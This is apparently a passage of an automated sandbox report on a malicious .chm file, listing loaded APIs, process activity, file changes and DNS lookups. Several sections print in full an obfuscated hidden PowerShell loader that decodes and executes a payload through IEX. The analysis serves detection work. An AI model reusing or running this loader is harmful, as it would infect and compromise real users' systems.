DynamicLoader: SHELL32.dll/SHGetKnownFolderPath

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/WSAIoctl

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: CRYPTBASE.dll/SystemFunction036

                    
                
                    
                        
DynamicLoader: ole32.dll/CLSIDFromOle1Class

                    
                
                    
                        
DynamicLoader: CLBCatQ.DLL/GetCatalogObject

                    
                
                    
                        
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountNameLocalW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountSidW

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: uxtheme.dll/ThemeInitApiHook

                    
                
                    
                        
DynamicLoader: USER32.dll/IsProcessDPIAware

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromIID

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetPSClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: ole32.dll/DcomChannelSetHResult

                    
                
                    
                        
DynamicLoader: wininet.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: wininet.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: wininet.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: wininet.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister

                    
                
                    
                        
DynamicLoader: Secur32.dll/GetUserNameExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver

                    
                
                    
                        
DynamicLoader: iertutil.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/WSAIoctl

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: WS2_32.dll/

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx

                    
                
                    
                        
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Resumed a thread in another process

            

            
                
                    
                        
thread_resumed: Process hh.exe with process ID 2492 resumed a thread in another process with the process ID 2492

                    
                
                    
                        
thread_resumed: Process powershell.exe with process ID 968 resumed a thread in another process with the process ID 968

                    
                
                    
                        
thread_resumed: Process wmiprvse.exe with process ID 1144 resumed a thread in another process with the process ID 1144

                    
                
                    
                        
thread_resumed: Process dllhost.exe with process ID 920 resumed a thread in another process with the process ID 920

                    
                
                    
                        
thread_resumed: Process dllhost.exe with process ID 2660 resumed a thread in another process with the process ID 2660

                    
                
            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Attempts to make a network connection via suspicious process

            

            
                

                    
                        
                    
                

            
            
            

        
            
            
                

            
            A process created a hidden window

            

            
                
                    
                        
process: hh.exe -> C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

                    
                
            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Executed a very long command line or script command which may be indicative of chained commands or obfuscation

            

            
                
                    
                        
command: "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                    
                
            
            
            

        
            
            
                

            
            Checks for presence of debugger via IsDebuggerPresent

            

            
                

                    
                        
                    
                

            
            
            

        
            
            
                

            
            A scripting utility was executed

            

            
                
                    
                        
command: "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                    
                
            
            
            

        
            
            
                

            
            Creates a hidden or system file

            

            
                
                    
                        
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF22641b9.TMP

                    
                
            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Uses Microsoft HTML Help Executable for executing PE files

            

            
                

                    
                        
                    
                

            
            
            

        
            
            
                

            
            Generates some ICMP traffic

            

            
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
                    
                        
ip: 172.61.0.2

                    
                
            
            
            

        
            
            
                

            
            A script or command line contains a long continuous string indicative of obfuscation

            

            
                
                    
                        
command: "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                    
                
            
            
            

        
            
            
                

            
            Modifies Windows System files (System32 / SysWOW64)

            

            
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\MAPPING3.MAP

                    
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\WRITABLE.TST

                    
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\MAPPING1.MAP

                    
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\MAPPING2.MAP

                    
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\OBJECTS.DATA

                    
                
                    
                        
ModifiedFile: C:\Windows\System32\wbem\repository\INDEX.BTR

                    
                
            
            
            

        
            
            
                

            
            Attempts to execute suspicious powershell command arguments

            

            
                
                    
                        
command: "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                    
                
            
            
            

        
            
            
                

            
            A powershell command using multiple variables was executed possibly indicative of obfuscation

            

            
                
                    
                        
command: "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                    
                
            
            
            

        
    






    
Screenshots

    
        

        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
            
                
            
        
        

    




    





   	
    	No playback available.
    








    

    
Hosts

    
        
No hosts contacted.

    




    

    
DNS

    
        

            

                Name
                Response
                Post-Analysis Lookup
            

            
                

                    
                        google.com [VT]
                        
                        
                    
                    
                        
                            A 172.61.0.2
                            
                                
                                [VT]
                                
                                
                                
                            
                            
                        
                    
                    
                        
                            74.125.68.113
                            [VT]
                            
                            
                        
                    
                

            
        

    







    

    
Summary

    
    

        

            

                
                    
                        \Device\KsecDD

                    
                        C:\Windows\Globalization\Sorting\sortdefault.nls

                    
                        C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chm

                    
                        C:\ProgramData\Microsoft

                    
                        C:\ProgramData\Microsoft\HTML Help

                    
                        C:\ProgramData

                    
                        C:\ProgramData\Microsoft\HTML Help\hhcolreg.dat

                    
                        C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chi

                    
                        C:\Windows\System32\en-US\hhctrl.ocx.mui

                    
                        C:\Users\user\AppData\Roaming\Microsoft

                    
                        C:\Users\user\AppData\Roaming\Microsoft\HTML Help

                    
                        C:\Users\user\AppData\Roaming\Microsoft\HTML Help\hh.dat

                    
                        C:\Windows\hh.dat

                    
                        C:\Users\user\AppData\Local\Temp

                    
                        C:\Users\user\AppData\Local\Temp\IMT5AE9.tmp

                    
